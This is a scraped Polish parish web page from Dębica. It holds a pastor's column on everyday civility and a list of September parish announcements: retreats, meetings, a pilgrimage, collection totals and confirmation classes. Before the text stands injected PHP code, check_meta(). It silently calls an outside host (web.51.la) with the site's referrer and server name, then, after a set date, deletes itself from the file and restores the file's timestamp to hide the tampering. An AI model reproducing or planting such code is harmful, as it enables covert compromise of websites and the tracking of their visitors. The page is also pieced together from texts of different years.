check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732005){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Informacje duszpasterskie - XXIV Niedziela Zwykła
28 sierpnia 2016r.

Znana jest nam wszystkim akcja promująca jakieś miasto jako Europejską Stolicę Kultury. Do takiego tytułu pretendują miasta posiadające dorobek szeroko rozumianej kultury, które promująca własną kulturę a także akcentują wartości europejskie. Takiego zaszczytu dostąpił w 2000 roku Kraków a w obecnym roku Wrocław. Mając to na uwadze przenoszę się do naszego pięknego miasta, w którym przyszło nam  żyć, pracować, odpoczywać, realizować marzenia i zdążać do nieba. Europejską Stolicą Kultury raczej nie zostaniemy, ale musimy czynić wiele, by kultura stale nam towarzyszyła. Ważne są działania ściśle związane z kulturą i takich raczej nam nie brakuje – kalendarz wydarzeń kulturalnych biorąc pod uwagę wielkość miasta i możliwości finansowe jest raczej bogaty. Owszem o kulturze świadczą różne imprezy i trwałe dokonania chociażby w dziedzinie infrastruktury, lecz równie ważną jej stroną są ludzkie zachowania. One tak właściwie powinny decydować o kulturze, nie tylko tej związanej z działalnością artystyczną, polityczną, społeczną czy gospodarczą ale z codzienną postawą człowieka wobec człowieka. Tutaj niestety mamy wiele do zrobienia. Promowane liberalne podejście do życia pozbawia nas smaku zachowania kulturalnego i niektórym mieszkańcom Dębicy wydaje się, że każde ich zachowanie jest wyrazem ich wolności a także swoiście rozumianej kultury. Ostatnio ktoś znowu znieważył Memoriał Smoleński oblewając go tym razem białą farbą. Nie wiem co tkwi w sercu tego człowieka (tych ludzi), że zdobywa się na taki czyn. Być może nie lubi śp. Lecha Kaczyńskiego (gdyż w jego podobiznę wycelował pojemnik z farbą) ale to nie jest powód do lekceważenia pamięci ofiar katastrofy a taką pamięć zawiera pomnik. Dziwne zachowania ludzkie zasygnalizowali opiekunowie Cmentarza Wojskowego przylegającego do Starego Cmentarza. Otóż systematycznie wyrzucane są tam śmieci a nawet elementy nagrobków, ławki na teren wojskowej nekropolii. Być może, że czynią to ludzie, którzy robią sobie schadzki alkoholowe na cmentarzu, ale czy czasami nie czynią to „porządni obywatele”, którym po prostu nie chce się odnieść śmieci do stojącego nieco dalej pojemnika. Dotarł do mnie również głos w sprawie zabaw urządzanych przez dzieci na Cmentarzu Żydowskim. O ile to jest prawdą to należy natychmiast przeciwstawić się takim zachowaniom a powinni uczynić to rodzice, którzy czasami beztrosko patrzą na swoje pociechy pozwalając im na wszystko.  A na koniec Plac Solidarności, na który wyprowadzane są pieski załatwiające swoje potrzeby, nawet pod krzyżem. Nie pretendujemy do miana Europejskiej Stolicy Kultury, ale dbajmy o codzienną kulturę czyniącej nasze życie w tym mieście o wiele piękniejszym.

Informacje duszpasterskie - XXIV Niedziela Zwykła Drukuj Email
Wpisany przez ks. Ryszard Piasecki   
sobota, 15 września 2012 00:00
 • Renowacja Misji Świętych
  będzie w dniach od 7 do 21 października. W pierwszym tygodniu swoje ćwiczenia duchowne będą mieli uczniowie szkoły podstawowej, gimnazjum i szkół średnich. Drugi tydzień będzie już dla wszystkich parafian. Zachęcam do udziału i tych, którzy nie mieli czasu w ubiegłym roku wziąć udziału w Misjach. Wszystkich zaś proszę o modlitwę w intencji renowacji Misji Świętych w naszej parafii, szczególnie grupy modlitewne i wspólnoty. 

 • Spotkania modlitewno-formacyjne:
  Rycerstwo Niepokalanej – środa – godz. 16.30;
  Towarzystwo Przyjaciół WSD – środa godz. 19.00;
  Stowarzyszenie Rodzin Katolickich – środa godz. 19.00.

 • Spotkanie Grupy Dzieci Niepełnosprawnych
  będzie w poniedziałek 17 września o godz. 15.30. Zapraszamy wszystkie dzieci wraz z opiekunami.
   
 • Ogólnopolska Pielgrzymka Małżeństw i Rodzin na Jasną Górę
  odbędzie się 23 września – główna uroczystość o godz. 11.00.  Szczegółowy program podany jest na afiszu.
   
 • Składka inwestycyjna
  przeprowadzona w ubiegłą niedzielę, w kopertach, przyniosła kwotę 11700 zł zaś ofiary złożone na tacę bez kopert wyniosły 5000 zł. Za wszelkie ofiary składamy podziękowanie. Przypominamy, że koszt renowacji posadzki wyniósł 25 tys. zł. Prosimy tych, którzy jeszcze nie mieli okazji włączyć się w sfinansowanie renowacji o złożenie ofiar w kopertach w najbliższą niedzielę.
   
 • Straż Honorowa Najświętszego Serca Pana Jezusa
  organizuje wyjazd na diecezjalne czuwanie modlitewne do Nowej Jastrząbki w dniu 21 września, wyjazd z Placu Solidarności o godz. 16.30, koszt 10 zł, zapisy w kancelarii lub tel. 14 6810593 (wieczorem do 19.09.12).

 • Diecezjalny Dzień Modlitw o Trzeźwość
  przypadający w niedzielę 30 września odbędzie się w Szczepanowie. Krucjata Wyzwolenie Człowieka organizuje wyjazd do Szczepanowa – zapisy na poniedziałkowym spotkaniu Krucjaty.

 • Msza św. w intencji poległych i pomordowanych żołnierzy
  zorganizowana przez Zarząd AK Koło Terenowe Dębica  zostanie odprawiona 23 września o godz. 10.30 w Kościele Św. Jadwigi.
   
 • Koncert wokalno-organowy
  odbędzie się w sobotę 22 września w Kościele Ducha Świętego o godz. 19.00. Utwory wokalne zaprezentuje znakomity tenor Ks. Rafał Kobyliński z Poznania, zaś solowe utwory organowe wykona Łukasz Mateja z Krakowa.
   
 • Ks. Prałat Bronisław Marczyk,
  emerytowany proboszcz Parafii Pustków Osiedle zamieszkał na plebani naszej parafii. Ostatnio zamieszkiwał w Parafii Rzochów. Będzie służył pomocą w spowiedzi św. w miarę swoich sił. Serdecznie witamy Księdza Bronisława w naszej wspólnocie i życzymy spokojnych dni oraz Bożej pomocy i wielu jeszcze potrzebnych sił. Do życzeń dołączamy serdeczną modlitwę w intencji wrześniowego solenizanta.

   
 • Obowiązkowe spotkanie gimnazjalistów z klas trzecich,
  przynależących do naszej parafii, a uczęszczających do różnych gimnazjów, w czwartek o 17.30. Rozpoczęcie w Domu Św. Jadwigi. Na spotkanie przychodzimy z rodzicami! Prosimy o dopilnowanie tej sprawy, gdyż jest to bezpośrednie przygotowanie do przyjęcia sakramentu bierzmowania. Zapraszamy także tych, którzy, z różnych przyczyn, w ubiegłym roku szkolnym nie przyjęli tego sakramentu a pragną do niego przystąpić.
   
 • Spotkanie liturgiczno-formacyjne,
  przygotowujące do sakramentu bierzmowania, uczniów klas drugich gimnazjum mieszkających na terenie naszej parafii, w piątek o 16.15 w Domu Św. Jadwigi. Spotkanie jest obowiązkowe.
   
 • Msza wspólnotowa
  na rozpoczęcie roku formacyjnego Ruchu Światło-Życie,
  połączona z wręczeniem świec animatorskich odbędzie się we wtorek o godz. 18.00, po niej spotkanie rejonowe par animatorskich Domowego Kościoła.
 
 

W ramach naszej witryny stosujemy pliki cookies w celu świadczenia Państwu usług na najwyższym poziomie, w tym w sposób dostosowany do indywidualnych potrzeb. Korzystanie z witryny bez zmiany ustawień dotyczących cookies oznacza, że będą one zamieszczane w Państwa urządzeniu końcowym. Możecie Państwo dokonać w każdym czasie zmiany ustawień dotyczących cookies.

POLECAMY
Diecezja Tarnowska Konferencja Episkopatu Polski Gość Niedzielny